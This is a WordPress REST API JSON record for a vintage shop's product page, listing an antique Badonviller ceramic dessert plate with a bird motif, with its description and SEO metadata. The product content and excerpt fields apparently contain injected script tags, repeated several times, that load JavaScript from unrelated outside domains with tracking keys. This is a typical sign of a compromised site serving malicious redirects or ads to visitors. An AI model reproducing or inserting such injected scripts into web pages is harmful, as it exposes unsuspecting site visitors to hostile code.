{"id":10286,"date":"2021-10-23T15:08:35","date_gmt":"2021-10-23T15:08:35","guid":{"rendered":"https:\/\/vintagefrenchfinds.com\/?post_type=product&#038;p=10286"},"modified":"2025-03-17T16:06:20","modified_gmt":"2025-03-17T16:06:20","slug":"ancienne-assiette-a-dessert-en-ceramique-badonviller-motif-oiseaux","status":"publish","type":"product","link":"https:\/\/vintagefrenchfinds.com\/en\/product\/ancienne-assiette-a-dessert-en-ceramique-badonviller-motif-oiseaux","title":{"rendered":"Antique French BADONVILLER Ceramic Dessert Plate with Bird Motif"},"content":{"rendered":"<p>Vintage dessert \/ cheese plate in white earthenware with a mint green rim and gold border, decorated in the center with 2 birds on blossoming branches.<\/p>\n<p>La manufacture de\u00a0 Badonvillier fut fond\u00e9e par Th\u00e9ophile Fenal en Meurthe-et-Moselle dans le 19eme si\u00e8cle. Au sommet de sa gloire, l&rsquo;usine comptait jusqu&rsquo;\u00e0 1000 salari\u00e9s. La famille Fenal rach\u00e8te au XX si\u00e8cle les fa\u00efenceries de Lun\u00e9ville et de St Cl\u00e9ment. Apr\u00e8s plusieurs fusions et changements, le groupe Fenal se fondi\u00e8ve dans le groupe \u00ab\u00a0terre d&rsquo;Est : Fa\u00efence et crystal de France\u00a0\u00bb<\/p>\n<p>Bon \u00e9tat g\u00e9n\u00e9ral avec des traces normales d&rsquo;usure.<\/p>\n<p>D 19 cm<\/p>\n<p>Several pieces available.<\/p>\n<p>Also on sale from the same collection: soup plates \/ dinner plates \/ dessert plates \/ large dishes<\/p>\n<p><script src=\"\/\/trableflick.com\/21aca573d498d25317.js\"><\/script><script src=\"https:\/\/hublosk.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/jullyambery.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1635001589912\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/trableflick.com\/ext\/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/trableflick.com\/21aca573d498d25317.js\"><\/script><script src=\"https:\/\/hublosk.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/jullyambery.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1635001721658\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/trableflick.com\/ext\/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>","protected":false},"excerpt":{"rendered":"<p>&nbsp;<\/p>\n<p><script src=\"\/\/trableflick.com\/21aca573d498d25317.js\"><\/script><script src=\"https:\/\/hublosk.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/jullyambery.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1635001589901\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/trableflick.com\/ext\/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>\n<p><script src=\"\/\/trableflick.com\/21aca573d498d25317.js\"><\/script><script src=\"https:\/\/hublosk.com\/js\/int.js?key=5f688b18da187d591a1d8d3ae7ae8fd008cd7871&amp;uid=8620x\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/jullyambery.net\/api?key=a1ce18e5e2b4b1b1895a38130270d6d344d031c0&amp;uid=8620x&amp;format=arrjs&amp;r=1635001721664\" type=\"text\/javascript\"><\/script><script src=\"https:\/\/trableflick.com\/ext\/21aca573d498d25317.js?sid=52587_8620_&amp;title=a&amp;blocks[]=31af2\" type=\"text\/javascript\"><\/script><\/p>","protected":false},"featured_media":10256,"template":"","meta":{"site-sidebar-layout":"default","site-content-layout":"default","ast-site-content-layout":"default","site-content-style":"default","site-sidebar-style":"default","ast-global-header-display":"","ast-banner-title-visibility":"","ast-main-header-display":"","ast-hfb-above-header-display":"","ast-hfb-below-header-display":"","ast-hfb-mobile-header-display":"","site-post-title":"","ast-breadcrumbs-content":"","ast-featured-img":"","footer-sml-layout":"","ast-disable-related-posts":"","theme-transparent-header-meta":"default","adv-header-id-meta":"","stick-header-meta":"","header-above-stick-meta":"","header-main-stick-meta":"","header-below-stick-meta":"","astra-migrate-meta-layouts":"set","ast-page-background-enabled":"default","ast-page-background-meta":{"desktop":{"background-color":"var(--ast-global-color-4)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}},"ast-content-background-meta":{"desktop":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"tablet":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""},"mobile":{"background-color":"var(--ast-global-color-5)","background-image":"","background-repeat":"repeat","background-position":"center center","background-size":"auto","background-attachment":"scroll","background-type":"","background-media":"","overlay-type":"","overlay-color":"","overlay-opacity":"","overlay-gradient":""}}},"product_cat":[3542,3546],"product_tag":[1197,1115,1845,1501,1659,1578,1023,1920,1251,1264,1011],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v20.8 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Ancienne Assiette \u00e0 Dessert en C\u00e9ramique BADONVILLER - Motif Oiseaux - Vintage French Finds<\/title>\n<meta name=\"description\" content=\"The best of French vintage delivered to your doorstep direct from France : fashion, furniture, decoration, table art, curiosities, collections and art work.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/vintagefrenchfinds.com\/en\/product\/ancienne-assiette-a-dessert-en-ceramique-badonviller-motif-oiseaux\/\" \/>\n<meta property=\"og:locale\" content=\"en_GB\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Ancienne Assiette \u00e0 Dessert en C\u00e9ramique BADONVILLER - Motif Oiseaux - Vintage French Finds\" \/>\n<meta property=\"og:description\" content=\"The best of French vintage delivered to your doorstep direct from France : fashion, furniture, decoration, table art, curiosities, collections and art work.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/vintagefrenchfinds.com\/en\/product\/ancienne-assiette-a-dessert-en-ceramique-badonviller-motif-oiseaux\/\" \/>\n<meta property=\"og:site_name\" content=\"Vintage French Finds\" \/>\n<meta property=\"article:modified_time\" content=\"2025-03-17T16:06:20+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/vintagefrenchfinds.com\/wp-content\/uploads\/2021\/10\/DSCN1561.jpg\" \/>\n\t<meta property=\"og:image:width\" content=\"886\" \/>\n\t<meta property=\"og:image:height\" content=\"340\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/jpeg\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Estimated reading time\" \/>\n\t<meta name=\"twitter:data1\" content=\"1 minute\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebPage\",\"@id\":\"https:\/\/vintagefrenchfinds.com\/product\/ancienne-assiette-a-dessert-en-ceramique-badonviller-motif-oiseaux\",\"url\":\"https:\/\/vintagefrenchfinds.com\/product\/ancienne-assiette-a-dessert-en-ceramique-badonviller-motif-oiseaux\",\"name\":\"Ancienne Assiette \u00e0 Dessert en C\u00e9ramique BADONVILLER - Motif Oiseaux - Vintage French Finds\",\"isPartOf\":{\"@id\":\"https:\/\/vintagefrenchfinds.com\/#website\"},\"datePublished\":\"2021-10-23T15:08:35+00:00\",\"dateModified\":\"2025-03-17T16:06:20+00:00\",\"description\":\"The best of French vintage delivered to your doorstep direct from France : fashion, furniture, decoration, table art, curiosities, collections and art work.\",\"breadcrumb\":{\"@id\":\"https:\/\/vintagefrenchfinds.com\/product\/ancienne-assiette-a-dessert-en-ceramique-badonviller-motif-oiseaux#breadcrumb\"},\"inLanguage\":\"en-GB\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/vintagefrenchfinds.com\/product\/ancienne-assiette-a-dessert-en-ceramique-badonviller-motif-oiseaux\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/vintagefrenchfinds.com\/product\/ancienne-assiette-a-dessert-en-ceramique-badonviller-motif-oiseaux#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/vintagefrenchfinds.com\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"BOUTIQUE\",\"item\":\"https:\/\/vintagefrenchfinds.com\/shop\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Ancienne Assiette \u00e0 Dessert en C\u00e9ramique BADONVILLER &#8211; Motif Oiseaux\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/vintagefrenchfinds.com\/#website\",\"url\":\"https:\/\/vintagefrenchfinds.com\/\",\"name\":\"Vintage French Finds\",\"description\":\"The best of French vintage delivered to your doorstep direct from France : fashion, furniture, decoration, table art, curiosities, collections and art work.\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/vintagefrenchfinds.com\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"en-GB\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Ancienne Assiette \u00e0 Dessert en C\u00e9ramique BADONVILLER - Motif Oiseaux - Vintage French Finds","description":"The best of French vintage delivered to your doorstep direct from France : fashion, furniture, decoration, table art, curiosities, collections and art work.","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/vintagefrenchfinds.com\/en\/product\/ancienne-assiette-a-dessert-en-ceramique-badonviller-motif-oiseaux\/","og_locale":"en_GB","og_type":"article","og_title":"Ancienne Assiette \u00e0 Dessert en C\u00e9ramique BADONVILLER - Motif Oiseaux - Vintage French Finds","og_description":"The best of French vintage delivered to your doorstep direct from France : fashion, furniture, decoration, table art, curiosities, collections and art work.","og_url":"https:\/\/vintagefrenchfinds.com\/en\/product\/ancienne-assiette-a-dessert-en-ceramique-badonviller-motif-oiseaux\/","og_site_name":"Vintage French Finds","article_modified_time":"2025-03-17T16:06:20+00:00","og_image":[{"width":886,"height":340,"url":"https:\/\/vintagefrenchfinds.com\/wp-content\/uploads\/2021\/10\/DSCN1561.jpg","type":"image\/jpeg"}],"twitter_card":"summary_large_image","twitter_misc":{"Estimated reading time":"1 minute"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebPage","@id":"https:\/\/vintagefrenchfinds.com\/product\/ancienne-assiette-a-dessert-en-ceramique-badonviller-motif-oiseaux","url":"https:\/\/vintagefrenchfinds.com\/product\/ancienne-assiette-a-dessert-en-ceramique-badonviller-motif-oiseaux","name":"Ancienne Assiette \u00e0 Dessert en C\u00e9ramique BADONVILLER - Motif Oiseaux - Vintage French Finds","isPartOf":{"@id":"https:\/\/vintagefrenchfinds.com\/#website"},"datePublished":"2021-10-23T15:08:35+00:00","dateModified":"2025-03-17T16:06:20+00:00","description":"The best of French vintage delivered to your doorstep direct from France : fashion, furniture, decoration, table art, curiosities, collections and art work.","breadcrumb":{"@id":"https:\/\/vintagefrenchfinds.com\/product\/ancienne-assiette-a-dessert-en-ceramique-badonviller-motif-oiseaux#breadcrumb"},"inLanguage":"en-GB","potentialAction":[{"@type":"ReadAction","target":["https:\/\/vintagefrenchfinds.com\/product\/ancienne-assiette-a-dessert-en-ceramique-badonviller-motif-oiseaux"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/vintagefrenchfinds.com\/product\/ancienne-assiette-a-dessert-en-ceramique-badonviller-motif-oiseaux#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/vintagefrenchfinds.com\/"},{"@type":"ListItem","position":2,"name":"BOUTIQUE","item":"https:\/\/vintagefrenchfinds.com\/shop"},{"@type":"ListItem","position":3,"name":"Ancienne Assiette \u00e0 Dessert en C\u00e9ramique BADONVILLER &#8211; Motif Oiseaux"}]},{"@type":"WebSite","@id":"https:\/\/vintagefrenchfinds.com\/#website","url":"https:\/\/vintagefrenchfinds.com\/","name":"Vintage French Finds\u00a0","description":"The best of French vintage delivered to your doorstep direct from France : fashion, furniture, decoration, table art, curiosities, collections and art work.","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/vintagefrenchfinds.com\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"en-GB"}]}},"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/vintagefrenchfinds.com\/en\/wp-json\/wp\/v2\/product\/10286"}],"collection":[{"href":"https:\/\/vintagefrenchfinds.com\/en\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/vintagefrenchfinds.com\/en\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/vintagefrenchfinds.com\/en\/wp-json\/wp\/v2\/media\/10256"}],"wp:attachment":[{"href":"https:\/\/vintagefrenchfinds.com\/en\/wp-json\/wp\/v2\/media?parent=10286"}],"wp:term":[{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/vintagefrenchfinds.com\/en\/wp-json\/wp\/v2\/product_cat?post=10286"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/vintagefrenchfinds.com\/en\/wp-json\/wp\/v2\/product_tag?post=10286"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}